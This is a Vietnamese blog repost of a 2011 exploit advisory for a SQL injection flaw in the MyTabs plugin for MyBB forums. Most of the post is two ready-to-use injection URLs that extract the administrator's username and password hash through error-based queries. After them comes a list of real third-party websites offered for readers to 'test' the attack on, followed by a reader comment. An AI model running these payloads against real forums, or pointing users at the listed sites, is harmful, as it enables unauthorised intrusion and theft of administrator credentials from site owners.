J2TEAM Security: A must-have extension for Chrome users. Install now!

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :


---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
Vài site để các bạn test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all
Leader at J2TEAM. Website: https://j2team.dev/

1 nhận xét

  1. sao k tạo cho em 1 blog như của anh :(
Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!